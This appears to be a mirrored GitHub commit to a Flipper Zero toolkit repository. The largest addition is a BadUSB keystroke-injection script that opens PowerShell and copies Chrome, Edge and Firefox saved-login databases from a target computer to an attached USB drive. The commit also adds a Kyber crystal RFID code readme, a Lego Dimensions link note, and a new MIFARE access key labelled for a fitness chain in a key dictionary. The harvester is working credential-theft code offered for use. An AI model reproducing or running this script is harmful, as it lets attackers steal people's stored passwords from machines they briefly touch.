mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-21 21:20:12 +00:00
Merge branch 'main' into mainRM
This commit is contained in:
commit
0236624fed
62
BadUSB/Credential_Harvester_MarkCyber.txt
Normal file
62
BadUSB/Credential_Harvester_MarkCyber.txt
Normal file
@ -0,0 +1,62 @@
|
||||
REM This script was created by github.com/MarkCyber
|
||||
REM Harvests all credentials from chrome, edge, and firefox
|
||||
REM This script requires a secondary USB named "MYUSB" to save credentials to
|
||||
REM The extracted data will require decryption
|
||||
REM
|
||||
REM Set delay for Flipper Zero
|
||||
DELAY 1000
|
||||
REM
|
||||
REM Open PowerShell without elevated privileges
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 1000
|
||||
REM
|
||||
REM Check if the USB drive exists
|
||||
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
|
||||
STRING if ($usbDrive -ne $null) {
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING cd $usbDrive;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING mkdir BrowserData;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING cd BrowserData;
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM
|
||||
REM Copy Chrome Login Data to USB
|
||||
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
|
||||
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM
|
||||
REM Copy Firefox Login Data to USB
|
||||
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
|
||||
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM
|
||||
REM Copy Edge Login Data to USB
|
||||
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
|
||||
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING }
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM
|
||||
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
|
||||
STRING echo off | clip
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM
|
||||
REM Close PowerShell
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM Check out my other badusb scripts on github.com/MarkCyber
|
@ -1 +1 @@
|
||||
Subproject commit 8fceb5db2ea78a99d87c3aece29c9e6c731eefd5
|
||||
Subproject commit 79a892ed2cad6ce8954ae7f59868dd476485373e
|
BIN
NFC/Amiibo/Kyber-Crystals/Blade-Commands-KC.png
Normal file
BIN
NFC/Amiibo/Kyber-Crystals/Blade-Commands-KC.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 114 KiB |
BIN
NFC/Amiibo/Kyber-Crystals/V1-Crystals-KC.png
Normal file
BIN
NFC/Amiibo/Kyber-Crystals/V1-Crystals-KC.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 148 KiB |
BIN
NFC/Amiibo/Kyber-Crystals/V1-Data-Sorting-KC.png
Normal file
BIN
NFC/Amiibo/Kyber-Crystals/V1-Data-Sorting-KC.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 126 KiB |
BIN
NFC/Amiibo/Kyber-Crystals/V2-Data-KC.png
Normal file
BIN
NFC/Amiibo/Kyber-Crystals/V2-Data-KC.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 202 KiB |
50
NFC/Amiibo/Kyber-Crystals/readme.md
Normal file
50
NFC/Amiibo/Kyber-Crystals/readme.md
Normal file
@ -0,0 +1,50 @@
|
||||
# Kyber Crystals
|
||||
|
||||
A how to program crystals from https://sabersourcing.com/2019/10/30/kyber-crystal-rfid-hack-star-wars-galaxys-edge/
|
||||
1. Turn on RFID Reader/Writer (make sure it’s set to 125KHz). Hold the kyber crystal next to the device and click the “Read” button. The device will say “Read success” and recite the current RFID number of the kyber crystal.
|
||||
2. Next, click the “Input” button. Enter the four digit number for your desired lightsaber blade color and dialogue set (see the complete list of RFID codes below). Press “Input” one more time.
|
||||
3. Hold the kyber crystal next to the device and the click the “Write” button. If desired, use one of the option RFID key fobs instead of the kyber crystal itself. The device will say “Write success” to indicate that writing to the device worked.
|
||||
4. Now you have reprogrammed the kyber crystal! Attach the kyber crystal to your Jedi Holocron or Sith Holocron to hear the dialogue of the reprogrammed kyber crystal. Alternatively, install the kyber crystal in your Savi’s Workshop lightsaber to view the new blade color.
|
||||
|
||||
From this froum post by mrgoodfellow https://forum.flipper.net/t/star-wars-galaxy-s-edge-kyber-crystal/2611/11
|
||||
|
||||
I have scanned several crystals and the example contents are:
|
||||
|
||||
BlueKyber.rfid -
|
||||
Filetype: Flipper RFID key
|
||||
Version: 1
|
||||
Key type: EM4100
|
||||
Data: 00 00 00 0C 0E
|
||||
|
||||
Here is a table of HEX converted values:
|
||||
|
||||
Ahsoka Tano dialogue White 3072 0000000C00
|
||||
Darth Vader dialogue Red 3073 0000000C01
|
||||
Unreleased Orange 3074 0000000C02
|
||||
Jedi Temple Guard dialogue Yellow 3075 0000000C03
|
||||
Qui-Gon Jinn dialogue Green 3076 0000000C04
|
||||
Unreleased Teal 3077 0000000C05
|
||||
Obi-Wan Kenobi (Original Trilogy era) dialogue Blue 3078 0000000C06
|
||||
Mace Windu (set 1) dialogue Purple 3079 0000000C07
|
||||
Chirrut Imwe dialogue White 3080 0000000C08
|
||||
Emperor Palpatine dialogue Red 3081 0000000C09
|
||||
Count Dooku dialogue Red 3082 0000000C0A
|
||||
Maz Kanata dialogue Yellow 3083 0000000C0B
|
||||
Yoda dialogue Green 3084 0000000C0C
|
||||
Darth Maul dialogue Red 3085 0000000C0D
|
||||
Luke Skywalker (Sequel Trilogy era) dialogue Blue 3086 0000000C0E
|
||||
Mace Windu (set 2) dialogue Purple 3087 0000000C0F
|
||||
Darth Vader (Magic 8 Ball) dialogue Red 3121 0000000C31
|
||||
Yoda (Magic 8 Ball) dialogue Green 3122 0000000C32
|
||||
Snoke dialogue (note: this is from the black kyber crystal) Red 3123 0000000C33
|
||||
I have been unsuccessful at unlocking or flashing any of the crystals or getting the flipper to emulate a crystal next to the saber in a way that changes the color. I have ordered some re-writable chips to create my own re-writable crystal. I will see if I have any success with them.
|
||||
|
||||
Here is a bunch of screenshots from https://docs.google.com/spreadsheets/d/1mZMBBxSc_ltAyheEVgKL4MpGfPc3iCjR1S6BEaavN40/edit#gid=1994856546
|
||||
(for some stupid reason they tuned off saving the doc to make things easy, so thank who ever did that and enjoy the pics lol)
|
||||
|
||||
Updated 5/12/24
|
||||
|
||||
![P1](Blade-Commands-KC.png)
|
||||
![P2](V1-Crystals-KC.png)
|
||||
![P3](V1-Data-Sorting-KC.png)
|
||||
![P4](V2-Data-KC.png)
|
3
NFC/Amiibo/Lego-Dimensions.md
Normal file
3
NFC/Amiibo/Lego-Dimensions.md
Normal file
@ -0,0 +1,3 @@
|
||||
# Lego Dimensions
|
||||
Everything you need to know is here https://github.com/dolmen-go/legodim
|
||||
And here http://www.proxmark.org/forum/viewtopic.php?id=2657
|
@ -2355,3 +2355,6 @@ C1F6C7B55F5E
|
||||
#
|
||||
# Metro card Sec 001 Blk 007 key B
|
||||
EDA4BF3E7B04
|
||||
#
|
||||
# Lime Fitness
|
||||
113355779933
|
||||
|
Loading…
Reference in New Issue
Block a user